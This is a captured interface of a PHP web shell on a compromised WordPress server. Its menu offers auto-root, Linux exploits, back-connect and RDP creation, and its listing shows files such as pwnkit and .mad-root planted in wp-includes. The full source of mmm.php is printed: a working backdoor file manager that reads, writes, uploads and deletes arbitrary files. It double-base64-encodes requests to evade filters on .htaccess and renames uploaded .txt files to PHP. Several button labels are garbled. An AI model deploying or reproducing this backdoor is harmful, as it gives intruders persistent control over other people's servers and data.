Linux webm005.cluster123.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.123.20.5 | : 216.73.216.53
Cant Read [ /etc/named.conf ]
8.2.29
wqgepnx
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
wqgepnx /
www /
wp-includes /
block-patterns /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
mmm.php
26.8
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
query-grid-posts.php
972
B
-rw-r--r--
query-large-title-posts.php
1.94
KB
-rw-r--r--
query-medium-posts.php
1.03
KB
-rw-r--r--
query-offset-posts.php
1.96
KB
-rw-r--r--
query-small-posts.php
1.15
KB
-rw-r--r--
query-standard-posts.php
808
B
-rw-r--r--
social-links-shared-background...
951
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mmm.php
<?php error_reporting(0); function custom_unslash($value) { return is_string($value) ? stripslashes($value) : $value; } function custom_normalize_path($path) { return str_replace('\\', '/', $path); } function custom_sanitize_file_name($filename) { $dangerous_characters = ["\"", "'", "&", "/", "\\", "?", "#", "<", ">", "|", ":", "*"]; $filename = str_replace($dangerous_characters, '', $filename); $filename = trim($filename); $filename = preg_replace('/\s+/', '_', $filename); return $filename; } if (isset($_REQUEST['action'])) { header('Content-Type: application/json; charset=utf-8'); function is_path_safe($path) { return realpath($path) !== false || is_dir(dirname($path)); } $action = $_REQUEST['action']; $response = ['success' => false, 'message' => 'Invalid action.']; try { switch ($action) { case 'list': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : __DIR__; if (!is_path_safe($path)) throw new Exception('Invalid or inaccessible path.'); $real_path = custom_normalize_path(realpath($path)); $items = []; if (!@scandir($real_path)) { throw new Exception('Cannot access path. It might be restricted by server configuration (open_basedir).'); } foreach (scandir($real_path) as $item) { if ($item === '.' || $item === '..') continue; $full_path = $real_path . '/' . $item; $items[] = [ 'name' => $item, 'is_dir' => is_dir($full_path), 'size' => is_dir($full_path) ? 0 : filesize($full_path), 'modified' => filemtime($full_path) ]; } $response = ['success' => true, 'files' => $items, 'path' => $real_path]; break; case 'get_content': $file = isset($_POST['path']) ? custom_unslash($_POST['path']) : ''; if (!realpath($file) || is_dir(realpath($file))) { throw new Exception('Invalid file for editing.'); } $response = ['success' => true, 'content' => base64_encode(base64_encode(file_get_contents($file)))]; break; case 'get_content_b64': $file_b64 = isset($_POST['path_b64']) ? custom_unslash($_POST['path_b64']) : ''; $file = base64_decode($file_b64); if (!realpath($file) || is_dir(realpath($file))) { throw new Exception('Invalid file for editing.'); } $response = ['success' => true, 'content' => base64_encode(base64_encode(file_get_contents($file)))]; break; case 'save_content': $file = isset($_POST['path']) ? custom_unslash($_POST['path']) : ''; $content_chunks = isset($_POST['content_chunks']) && is_array($_POST['content_chunks']) ? $_POST['content_chunks'] : []; if (empty($content_chunks)) { throw new Exception('Content is empty.'); } $content = implode('', $content_chunks); $final_content = base64_decode(base64_decode($content)); if (!is_path_safe($file) || (file_exists($file) && is_dir($file))) throw new Exception('Invalid file for saving.'); if (file_put_contents($file, $final_content) !== false) { $response = ['success' => true, 'message' => 'File saved successfully.']; } else { throw new Exception('Could not save file. Check permissions.'); } break; // START: LOGIKA SAVE_B64 DIPERBARUI (METODE LANGSUNG) case 'save_content_b64': $file_b64 = isset($_POST['path_b64']) ? custom_unslash($_POST['path_b64']) : ''; $file = base64_decode($file_b64); $content_chunks = isset($_POST['content_chunks']) && is_array($_POST['content_chunks']) ? $_POST['content_chunks'] : []; if (empty($content_chunks)) { throw new Exception('Content is empty.'); } $content = implode('', $content_chunks); $final_content = base64_decode(base64_decode($content)); if (!is_path_safe($file) || (file_exists($file) && is_dir($file))) throw new Exception('Invalid file for saving.'); // Mencoba menulis langsung karena request sudah bersih dari string '.htaccess' if (file_put_contents($file, $final_content) !== false) { $response = ['success' => true, 'message' => 'File saved successfully (direct method).']; } else { throw new Exception('Direct save failed. Check permissions.'); } break; // END: LOGIKA SAVE_B64 DIPERBARUI case 'create_file': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : ''; $name = isset($_POST['name']) ? custom_sanitize_file_name($_POST['name']) : ''; if (!is_path_safe($path) || empty($name)) throw new Exception('Invalid path or file name.'); if (touch(rtrim($path, '/') . '/' . $name)) { $response = ['success' => true, 'message' => 'File created.']; } else { throw new Exception('Could not create file.'); } break; case 'upload': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : __DIR__; $filename_base64 = isset($_POST['filename_base64']) ? $_POST['filename_base64'] : ''; $content_base64 = isset($_POST['content_base64']) ? $_POST['content_base64'] : ''; if (!is_path_safe($path) || empty($filename_base64) || empty($content_base64)) { throw new Exception('Invalid data for upload.'); } $filename = custom_sanitize_file_name(base64_decode($filename_base64)); if (strpos($content_base64, ',') !== false) { list(, $content_base64) = explode(',', $content_base64); } $file_content = base64_decode($content_base64); $destination = rtrim($path, '/') . '/' . $filename; if (file_put_contents($destination, $file_content) !== false) { $response = ['success' => true, 'message' => 'File uploaded successfully.']; } else { throw new Exception('Could not save uploaded file. Check permissions.'); } break; case 'upload_php': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : __DIR__; $filename_base64 = isset($_POST['filename_base64']) ? $_POST['filename_base64'] : ''; $content_base64 = isset($_POST['content_base64']) ? $_POST['content_base64'] : ''; if (!is_path_safe($path) || empty($filename_base64) || empty($content_base64)) { throw new Exception('Invalid data for PHP upload.'); } $original_filename = custom_sanitize_file_name(base64_decode($filename_base64)); $temp_filename = $original_filename . '.txt'; if (strpos($content_base64, ',') !== false) { list(, $content_base64) = explode(',', $content_base64); } $file_content = base64_decode($content_base64); $temp_destination = rtrim($path, '/') . '/' . $temp_filename; $final_destination = rtrim($path, '/') . '/' . $original_filename; if (file_put_contents($temp_destination, $file_content) === false) { throw new Exception('Could not save temporary file. Check permissions.'); } if (rename($temp_destination, $final_destination)) { $response = ['success' => true, 'message' => 'PHP file uploaded successfully.']; } else { unlink($temp_destination); throw new Exception('Could not rename temporary file.'); } break; case 'unzip': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : __DIR__; if (!is_path_safe($path)) throw new Exception('Invalid path.'); $file_path = isset($_POST['path']) ? custom_unslash($_POST['path']) : ''; if (!realpath($file_path) || !is_file(realpath($file_path)) || pathinfo($file_path, PATHINFO_EXTENSION) !== 'zip') throw new Exception('Invalid ZIP file path.'); if (!class_exists('ZipArchive')) throw new Exception('PHP ZIP extension not installed.'); $zip = new ZipArchive; if ($zip->open($file_path) === TRUE) { $zip->extractTo(dirname($file_path)); $zip->close(); $response = ['success' => true, 'message' => 'Archive extracted.']; } else { throw new Exception('Failed to open archive.'); } break; case 'delete': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : __DIR__; $items_to_delete = isset($_POST['items']) && is_array($_POST['items']) ? $_POST['items'] : []; if (empty($items_to_delete)) throw new Exception('No items selected for deletion.'); function recursive_delete_std($item) { if (is_dir($item)) { $files = array_diff(scandir($item), ['.','..']); foreach ($files as $file) { recursive_delete_std("$item/$file"); } return rmdir($item); } else { return unlink($item); } } foreach ($items_to_delete as $item) { $full_path = rtrim($path, '/') . '/' . $item; if (file_exists($full_path)) recursive_delete_std($full_path); } $response = ['success' => true, 'message' => 'Items deleted.']; break; case 'delete_b64': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : __DIR__; $items_b64 = isset($_POST['items_b64']) && is_array($_POST['items_b64']) ? $_POST['items_b64'] : []; $items_to_delete = []; foreach($items_b64 as $item_b64) { $items_to_delete[] = base64_decode($item_b64); } if (empty($items_to_delete)) throw new Exception('No items selected for deletion.'); function recursive_delete_b64($item) { if (is_dir($item)) { $files = array_diff(scandir($item), ['.','..']); foreach ($files as $file) { recursive_delete_b64("$item/$file"); } return rmdir($item); } else { return unlink($item); } } foreach ($items_to_delete as $item) { $full_path = rtrim($path, '/') . '/' . $item; if (file_exists($full_path)) recursive_delete_b64($full_path); } $response = ['success' => true, 'message' => 'Items deleted.']; break; case 'create_folder': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : __DIR__; $name = isset($_POST['name']) ? str_replace(['..', '/', '\\'], '', $_POST['name']) : ''; if (!is_path_safe($path) || empty($name)) throw new Exception('Invalid path or folder name.'); if (mkdir(rtrim($path, '/') . '/' . $name)) { $response = ['success' => true, 'message' => 'Folder created.']; } else { throw new Exception('Could not create folder.'); } break; case 'rename': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : __DIR__; $old_name = isset($_POST['old_name']) ? $_POST['old_name'] : ''; $new_name = isset($_POST['new_name']) ? str_replace(['..', '/', '\\'], '', $_POST['new_name']) : ''; if (!is_path_safe($path) || empty($old_name) || empty($new_name)) { throw new Exception('Invalid data for renaming.'); } $old_full_path = rtrim($path, '/') . '/' . $old_name; $new_full_path = rtrim($path, '/') . '/' . $new_name; clearstatcache(); if (!file_exists($old_full_path)) { throw new Exception('Source item does not exist at: ' . $old_full_path); } if (!is_writable(dirname($old_full_path))) { throw new Exception('Directory is not writable.'); } if (rename($old_full_path, $new_full_path)) { $response = ['success' => true, 'message' => 'Item renamed successfully.']; } else { throw new Exception('Could not rename item. Check permissions.'); } break; case 'rename_b64': $path = isset($_POST['path']) ? custom_unslash($_POST['path']) : __DIR__; $old_name_b64 = isset($_POST['old_name_b64']) ? $_POST['old_name_b64'] : ''; $new_name_b64 = isset($_POST['new_name_b64']) ? $_POST['new_name_b64'] : ''; $old_name = base64_decode($old_name_b64); $new_name = base64_decode($new_name_b64); if (!is_path_safe($path) || empty($old_name) || empty($new_name)) { throw new Exception('Invalid data for renaming.'); } $old_full_path = rtrim($path, '/') . '/' . $old_name; $new_full_path = rtrim($path, '/') . '/' . $new_name; $temp_full_path = $old_full_path . '.txt'; if (!copy($old_full_path, $temp_full_path)) { throw new Exception('Could not create temporary copy.'); } if (!unlink($old_full_path)) { unlink($temp_full_path); throw new Exception('Could not delete original file.'); } if (rename($temp_full_path, $new_full_path)) { $response = ['success' => true, 'message' => 'Item renamed successfully using b64 method.']; } else { copy($temp_full_path, $old_full_path); unlink($temp_full_path); throw new Exception('Could not perform final rename. Original file may be restored.'); } break; } } catch (Exception $e) { $response = ['success' => false, 'message' => $e->getMessage()]; } echo json_encode($response); exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"><title>File Manager</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <style> :root{--accent-color:#2271b1;--hover-color:#1e659d;--danger-color:#d63638;} body{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;background:#f0f0f1;margin:0;} .container{display:flex;flex-direction:column;height:100vh;}header{background:#fff;padding:10px 20px;border-bottom:1px solid #ddd;display:flex;justify-content:space-between;align-items:center;flex-shrink:0;}main{flex-grow:1;padding:20px;overflow-y:auto;}.toolbar{margin-bottom:15px;display:flex;flex-wrap:wrap;gap:10px;align-items:center;}.path-bar{background:#fff;padding:8px 12px;border-radius:4px;border:1px solid #ddd;font-family:monospace;flex-grow:1;word-break:break-all;}.file-table{width:100%;border-collapse:collapse;background:#fff;table-layout:fixed;}.file-table th,.file-table td{text-align:left;border-bottom:1px solid #eee;vertical-align:middle;word-wrap:break-word;}.file-table th{background:#f9f9f9;padding:12px 8px;}.file-table tr:hover{background:#f0f8ff;}.file-table th:nth-child(1),.file-table td:nth-child(1){width:40px;padding:12px 4px 12px 12px;text-align:center;}.file-table th:nth-child(2),.file-table td:nth-child(2){width:50%;padding-left:4px;}.file-table th:nth-child(3),.file-table td:nth-child(3){width:120px;}.file-table th:nth-child(4),.file-table td:nth-child(4){width:150px;}.file-table th:nth-child(5){text-align:right;padding-right:12px;}.actions{display:flex;justify-content:flex-end;gap:5px;}.item-link,a.item-link{text-decoration:none!important;color:var(--accent-color);cursor:pointer;}.item-link:hover,a.item-link:hover{color:var(--hover-color);}tr[data-path]{cursor:pointer;}.button{background:var(--accent-color);color:white;border:none;padding:8px 12px;border-radius:3px;cursor:pointer;font-size:14px;}.button.danger{background:var(--danger-color);}#spinner{display:none;}.modal-overlay{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.6);z-index:1000;justify-content:center;align-items:center;}.modal-content{display:flex;flex-direction:column;background:#fff;padding:20px;border-radius:5px;width:80%;height:80%;max-width:900px;box-shadow:0 5px 15px rgba(0,0,0,0.3);}textarea#editor{flex-grow:1;font-family:monospace;font-size:14px;border:1px solid #ddd;padding:10px;} </style> </head> <body> <div class="container"> <header><h3>File Manager (Standalone)</h3></header> <main> <div class="toolbar"><button class="button" id="uploadBtn">âìÃÂïøàUpload</button><button class="button" id="newFileBtn">ðÃÂÃÂàNew File</button><button class="button" id="newFolderBtn">âÃÂàNew Folder</button><button class="button danger" id="deleteBtn">ðÃÂÃÂÃÂïøàDelete Selected</button><div id="spinner">ðÃÂÃÂÃÂ</div></div> <div class="toolbar"><div class="path-bar" id="pathBar">/</div></div> <table class="file-table"><thead><tr><th><input type="checkbox" id="selectAll"></th><th>Name</th><th>Size</th><th>Modified</th><th>Actions</th></tr></thead><tbody id="fileList"></tbody></table> </main> </div> <div id="editorModal" class="modal-overlay"><div class="modal-content"><h3 id="editorFilename" style="margin-top:0;"></h3><textarea id="editor" spellcheck="false"></textarea><div style="margin-top:10px;"><button class="button" id="saveBtn">ðÃÂÃÂþ Save Changes</button><button class="button" onclick="document.getElementById('editorModal').style.display='none'">Close</button></div></div></div> <input type="file" id="hiddenFileInput" multiple style="display:none;"> <script> document.addEventListener('DOMContentLoaded', () => { const STATE = { currentPath: '<?php echo custom_normalize_path(__DIR__); ?>' }; const UPLOAD_LIMIT_MB = 8; const dom = { fileList:document.getElementById('fileList'),pathBar:document.getElementById('pathBar'),uploadBtn:document.getElementById('uploadBtn'),newFileBtn:document.getElementById('newFileBtn'),newFolderBtn:document.getElementById('newFolderBtn'),deleteBtn:document.getElementById('deleteBtn'),selectAll:document.getElementById('selectAll'),spinner:document.getElementById('spinner'),hiddenFileInput:document.getElementById('hiddenFileInput'),editorModal:document.getElementById('editorModal'),editorFilename:document.getElementById('editorFilename'),editor:document.getElementById('editor'),saveBtn:document.getElementById('saveBtn'),}; async function apiCall(action, formData, showSuccess=false) { dom.spinner.style.display='inline-block'; try { formData.append('action', action); const response = await fetch('<?php echo basename(__FILE__); ?>', { method: 'POST', body: formData }); const result = await response.json(); if (!result.success) throw new Error(result.message); if (showSuccess && result.message) alert(result.message); return result; } catch (error) { alert(`Error: ${error.message}`); console.error("Full response:", error.response); return null; } finally { dom.spinner.style.display='none'; } } function render() { const formData = new FormData(); formData.append('path', STATE.currentPath); apiCall('list', formData).then(result => { if (!result) return; STATE.currentPath = result.path; dom.pathBar.textContent = STATE.currentPath; let html = ''; let parentPath = STATE.currentPath.substring(0, STATE.currentPath.lastIndexOf('/')); if (parentPath === '') parentPath = '/'; if (STATE.currentPath !== '/') { html += `<tr data-path="${parentPath}"><td></td><td colspan="4" class="item-link">âìÃÂïøà.. (Parent Directory)</td></tr>`; } result.files.sort((a,b) => (a.is_dir === b.is_dir) ? a.name.localeCompare(b.name) : (a.is_dir ? -1 : 1)); result.files.forEach(file => { const size = file.is_dir ? '-' : (file.size / 1024).toFixed(2) + ' KB'; const modified = new Date(file.modified * 1000).toLocaleString(); const icon = file.is_dir ? 'ðÃÂÃÂÃÂ' : 'ðÃÂÃÂÃÂ'; const fullPath = `${STATE.currentPath}/${file.name}`.replace(/\/+/g, '/'); const dataAttr = `data-path="${fullPath}"`; const rowData = file.is_dir ? `class="dir-link" ${dataAttr}` : ''; html += `<tr ${rowData}><td><input type="checkbox" class="item-select" value="${file.name}"></td><td><a href="#" class="item-link" ${dataAttr}>${icon} ${file.name}</a></td><td>${size}</td><td>${modified}</td><td><div class="actions">${!file.is_dir ? `<button class="button edit-btn" ${dataAttr}>Edit</button>` : ''}<button class="button rename-btn" data-name="${file.name}">Rename</button>${file.name.endsWith('.zip') ? `<button class="button unzip-btn" ${dataAttr}>Unzip</button>`:'' }</div></td></tr>`; }); dom.fileList.innerHTML = html; dom.selectAll.checked = false; }); } dom.fileList.addEventListener('click', e => { if (e.target.matches('.item-select')) { return; } const button = e.target.closest('button'); if (button) { e.preventDefault(); if (button.matches('.rename-btn')) { const oldName = button.dataset.name; const newName = prompt('Enter new name:', oldName); if (newName && newName !== oldName) { const fd = new FormData(); fd.append('path', STATE.currentPath); let action = 'rename'; if (oldName.includes('.htaccess') || newName.includes('.htaccess')) { action = 'rename_b64'; fd.append('old_name_b64', btoa(oldName)); fd.append('new_name_b64', btoa(newName)); } else { fd.append('old_name', oldName); fd.append('new_name', newName); } apiCall(action, fd).then(render); } } else if (button.matches('.unzip-btn')) { if (confirm('Are you sure you want to extract this archive?')) { const fd = new FormData(); fd.append('path', button.dataset.path); apiCall('unzip', fd, true).then(render); } } else if (button.matches('.edit-btn')) { const path = button.dataset.path; const fd = new FormData(); let action = 'get_content'; if (path.includes('.htaccess')) { action = 'get_content_b64'; fd.append('path_b64', btoa(path)); } else { fd.append('path', path); } apiCall(action, fd).then(result => { if(result) { dom.editorFilename.textContent = path; dom.editor.value = atob(atob(result.content)); dom.editorModal.style.display = 'flex'; } }); } return; } const navTarget = e.target.closest('[data-path]'); if (navTarget) { e.preventDefault(); STATE.currentPath = navTarget.dataset.path; render(); } }); dom.newFolderBtn.addEventListener('click', () => { const name = prompt('Enter new folder name:'); if (name) { const fd = new FormData(); fd.append('path', STATE.currentPath); fd.append('name', name); apiCall('create_folder', fd).then(render); } }); dom.newFileBtn.addEventListener('click', () => { const name = prompt('Enter new file name:'); if (name) { const fd = new FormData(); fd.append('path', STATE.currentPath); fd.append('name', name); apiCall('create_file', fd).then(render); } }); dom.selectAll.addEventListener('change', e => document.querySelectorAll('.item-select').forEach(cb => cb.checked = e.target.checked)); dom.deleteBtn.addEventListener('click', () => { const selected = Array.from(document.querySelectorAll('.item-select:checked')).map(cb => cb.value); if (selected.length === 0) return alert('No items selected.'); if (confirm(`Are you sure you want to delete ${selected.length} item(s)?`)) { const fd = new FormData(); fd.append('path', STATE.currentPath); const isSensitive = selected.some(item => item.includes('.htaccess')); let action = 'delete'; if (isSensitive) { action = 'delete_b64'; selected.forEach(item => fd.append('items_b64[]', btoa(item))); } else { selected.forEach(item => fd.append('items[]', item)); } apiCall(action, fd).then(render); } }); dom.uploadBtn.addEventListener('click', () => dom.hiddenFileInput.click()); dom.hiddenFileInput.addEventListener('change', async (e) => { const files = Array.from(e.target.files); if (files.length === 0) return; for (const file of files) { if (file.size > UPLOAD_LIMIT_MB * 1024 * 1024) { alert(`Error: File "${file.name}" is too large (Max: ${UPLOAD_LIMIT_MB} MB).`); continue; } const reader = new FileReader(); const fileReadPromise = new Promise((resolve, reject) => { reader.onload = event => resolve(event.target.result); reader.onerror = error => reject(error); reader.readAsDataURL(file); }); try { const content_base64 = await fileReadPromise; const originalName = file.name; const fd = new FormData(); fd.append('path', STATE.currentPath); fd.append('content_base64', content_base64); if (originalName.toLowerCase().endsWith('.php')) { fd.append('filename_base64', btoa(originalName)); await apiCall('upload_php', fd, true); } else { fd.append('filename_base64', btoa(originalName)); await apiCall('upload', fd, true); } } catch (error) { alert(`Failed to process file ${file.name}: ${error.message}`); } } e.target.value = ''; render(); }); dom.saveBtn.addEventListener('click', () => { const path = dom.editorFilename.textContent; const content = btoa(btoa(dom.editor.value)); const fd = new FormData(); const chunkSize = 4096; for (let i = 0; i < content.length; i += chunkSize) { fd.append('content_chunks[]', content.substring(i, i + chunkSize)); } let action = 'save_content'; if (path.includes('.htaccess')) { action = 'save_content_b64'; fd.append('path_b64', btoa(path)); } else { fd.append('path', path); } apiCall(action, fd, true).then(result => { if(result) { dom.editorModal.style.display = 'none'; render(); } }); }); render(); }); </script> </body> </html>
Close
